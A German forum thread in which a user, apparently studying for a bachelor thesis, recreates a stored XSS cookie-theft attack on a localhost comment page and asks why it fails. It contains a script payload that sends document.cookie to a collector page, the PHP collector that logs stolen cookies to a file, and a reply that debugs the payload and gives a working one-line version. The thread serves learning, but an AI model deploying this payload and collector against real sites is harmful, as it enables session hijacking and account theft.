simulation eines xss angriffs

  • hi,



    in diesem video:
    https://www.youtube.com/watch?v=OVLz6RgOjIY


    wird ein simpler xss angriff gezeigt, nach abtippen des codes funktioniert zwar das eintragen eines normalen kommentars, jedoch nicht das eintragen von:
    <script type="text/javascript">
    window.location = 'http://localhost/bachelorarbeit/cookies.php?cookies='+document.cookie;
    <script>



    das eingabefeld für weitere kommentare verschwindet aber die cookies werden nicht auf dem server gespeichert :(+
    die eingabe möglichkeit über das post comment field verschwindet weil document.location auf eine andere seite weiterleitet oder?



    index.php : dieser teil funktioniert solange man kein <script>... verwendet:





    cookies.php : dieser teil schreibt nicht den inhalt der cookies wie erwartet in die datei cookies.txt
    diese sollte am gleichen ort wie die index.php erscheinen?


    HTML
    1. <?php
    2. $fp = fopen('cookies.txt', 'a');
    3. fwrite($fp, $_GET['cookies'] . "\n\n");
    4. fclose($fp);
    5. ?>
  • Dein Injizierter Javascript Code ist fehlerhaft.


    Beim Auslesen der Datei wird nl2br aufgerufen, wenn du dein Script also mit Umbrüchen versiehst, wird an deren Stelle <br> eingefügt, dadurch wird dein Script nicht mehr ausgeführt. Das Forumlar wird nicht mehr angezeigt, weil du im schließenden Script-Tag den Schrägstrich vergessen hast, dadurch wird die restliche Seite als Javascript interpretiert und nicht mehr angezeigt.


    So funktioniert es:


    Code
    1. <script>window.location = 'http://localhost/bachelorarbeit/cookies.php?cookies='+document.cookie;</script>